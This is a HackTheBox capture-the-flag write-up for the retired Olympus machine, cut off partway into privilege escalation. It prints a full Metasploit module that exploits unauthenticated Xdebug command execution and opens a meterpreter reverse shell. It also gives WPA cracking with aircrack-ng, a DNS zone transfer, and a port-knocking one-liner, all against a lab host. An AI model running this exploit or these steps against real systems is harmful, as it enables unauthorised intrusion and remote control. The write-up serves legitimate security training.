HackTheBox Writeup — Olympus

9 min readSep 22, 2018

Hello Guys , I am Faisal Husaini and this is my writeup on Medium for Olympus machine which has retired and also this was my favorite box on HTB. My username on HTB is “faisalelino” .

This writeup is on Olympus box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.

The IP for this machine is 10.10.10.83, so let’s get started

NMAP Results

First we do nmap scan using the command “nmap -sC -sV -oA nmap 10.10.10.83”

# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp filtered mit-ml-dev
144/tcp filtered news
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,”\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,”SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n”);
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018–1 IP address (1 host up) scanned in 78.87 seconds

We see port 22 for ssh is filtered , also port 80 is open , so lets open the IP in browser

HTTP Service

Nothing interesting here………. Let’s look at the source code too

We see here nothing much important in the http , neither we got something from its source code , so its time for dirb scan

Dirb

We dont get anything much of use from dirb , so its time to run nikto on http://10.10.10.83/

Nikto

Nikto says uncommon header ‘xdebug’ found , so now lets google about it

XDebug

As this was given about xdebug on its official website , so lets find for its exploit if any

MSF Exploit for XDebug on Exploit-DB by MinatoTW

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘xdebug Unauthenticated OS Command Execution’,
‘Description’ => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
‘DisclosureDate’ => ‘Sep 17 2017’,
‘Author’ => [
‘Ricter Zheng’, #Discovery https://twitter.com/RicterZ
‘Taki Tachibana’, # MinatoTW
‘Mumbai’ # Austin Hudson
],
‘References’ => [
[‘URL’, ‘https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
[‘URL’, ‘https://paper.seebug.org/397/']
],
‘License’ => MSF_LICENSE,
‘Platform’ => ‘php’,
‘Arch’ => [ARCH_PHP],
‘DefaultTarget’ => 0,
‘Stance’ => Msf::Exploit::Stance::Aggressive,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘php/meterpreter/reverse_tcp’
},
‘Payload’ => {
‘DisableNops’ => true,
},
‘Targets’ => [[ ‘Automatic’, {} ]],
))

register_options([
OptString.new(‘PATH’, [ true, “Path to target webapp”, “/index.php”]),
OptAddress.new(‘SRVHOST’, [ true, “Callback host for accepting connections”, “0.0.0.0”]),
OptInt.new(‘SRVPORT’, [true, “Port to listen for the debugger”, 9000]),
Opt::RPORT(80),
OptString.new(‘WriteableDir’, [ true, “A writeable directory on the target”, “/tmp”])
])
end

def check
begin
res = send_request_cgi({
‘uri’ => datastore[“PATH”],
‘method’ => ‘GET’,
‘vars_get’ => {
‘XDEBUG_SESSION_START’ => rand_text_alphanumeric(10)
}
})
vprint_status “Request sent\n#{res.headers}”
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good(“Looks like remote server has xdebug enabled\n”)
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end

def exploit
payl = Rex::Text.encode_base64(“#{payload.encoded}”)
file = “#{datastore[‘WriteableDir’]}”+”/”+rand_text_alphanumeric(5)
cmd1 = “eval -i 1 — “ + Rex::Text.encode_base64(“file_put_contents(\”#{file}\”,base64_decode(\”#{payl}\”)) && system(\” php #{file} \”)”) + “\x00”
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
‘LocalPort’ => datastore[‘SRVPORT’],
‘LocalHost’ => datastore[‘SRVHOST’],
‘Context’ => {
‘Msf’ => framework,
‘MsfExploit’ => self
})

client = server.accept
print_status(“Waiting for client response.”)
data = client.recv(1024)
print_status(“Receiving response”)
vprint_line(data)
print_status(“Shell might take upto a minute to respond.Please be patient.”)
print_status(“Sending payload of size #{cmd1.length} bytes”)
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
‘uri’ => datastore[‘PATH’],
‘method’ => ‘GET’,
‘headers’ => {
‘X-Forwarded-For’ => “#{lhost}”,
‘Cookie’ => ‘XDEBUG_SESSION=’+rand_text_alphanumeric(10)
}
})
end
end

Exploting XDebug using MSFConsole

We have to set RHOST which is 10.10.10.83 and LHOST to our tun0 IP address and then run the exploit command

Bingo.!! We got meterpreter , now lets move on and see the contents

Diging into Meterpreter

Nothing much here , lets see the contents of Zeus user

We see something much like git folders , airgeddon.sh , a folder name captured etc..

Let’s see the contents of airgeddon.sh , we see that its very length bash script code , so nothing interesting there , now let’s dive to captured folder

We got a .cap file , we download it using our meterpreter shell.

Now lets crack this captured.cap file using aircrack

Cracking CAP file using Aircrack-ng

We crack the captured.cap file using the tool aircrack-ng

Command Used : aircrack-ng captured.cap -w rockyou.txt , and then we wait for the cracking to get finished

We got the key , which is “flightoficarus”

This was bit tricky to understand , then I came to know the word Icarus seems to be like greek which this box is based on , and that also from
nmap results we saw that ssh is open on port 2222 , so Icarus maybe the username , but what about password?

After asking a hint from my friend , he told me to see the captured.cap file , so i thought that the word “captured” maybe the password , but no..!!

Then Iopened the captured.cap file using Wireshark

Opening captured.cap file using Wireshark

We see something as a sentence , that maybe the password , so the sentence was like “Too_cl0se_to_th3_Sun” , now we copy this and connect to ssh

Connecting to SSH on Port 2222

We connect to ssh using this command:

ssh icarus@10.10.10.83 -p2222

Bingo we got in to ssh , lets see whats inside the home folder by “ls” command

We see a txt file name help_of_the_gods.txt and inside it we got a dns , so i will copy it to my /etc/hosts file with the IP of 10.10.10.83

DIG

I tried alot of things , which when doing ctfolympus.htb on the browser , it was displaying the same thing as when we were doing using the IP

So after talking a help from my friend , he told me to use dig

So Iused dig with “dig axfr ctfolympus.htb @10.10.10.83” , we get

In the txt area we see “St34l_th3_F1re!” which was similar to the password style for Icarus we got from captured.cap

But what about username , we see that “prometheus” from the same txt area , but when we tried it on port 2222 of ssh , it failed to connect

Also port 22 was filtered , then I didnt knew about port knocking , which my friend gave me help by saying to watch Ippsec’s Nineveh video

So from that Ilearn about port knocking and now we got to that part

Port Knocking

I create a simple bash command for the port knocking

After watching the nineveh video from Ippsec , I saw that he used 3 ports from iptables or something , which I didn’t had in this box

So what to do????

Remember the txt area we got from dig , I said portal to Hades and then was 3 numbers

portal

These are the 3 ports to be used for port knocking , i.e, 3456 , 8234, 62431

So I used this command for knocking and also directly connect to ssh on port 22

for i in 3456 8234 62431; do nmap -Pn -p $i — host-timeout 201 — max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83

Now it connects to ssh without saying the port being filtered , now we enter the password which was “St34l_th3_F1re!”

And we get in , now lets get the user flag

User Flag

User flag was in the same directory , so when we do the ls command and then cat “user.txt” , we get the flag

Bingo , now time for root

Privelege Escalation

Lets import the LinEnum.sh script from my local machine and then run and see the results

We were not able to run sudo command as prometheus , so after the script execution complete , we saw only 1 thing interesting

The user was hosting docker , which maybe a hint to docker privilege escalation , so after searching on google for docker privilege escalation , I got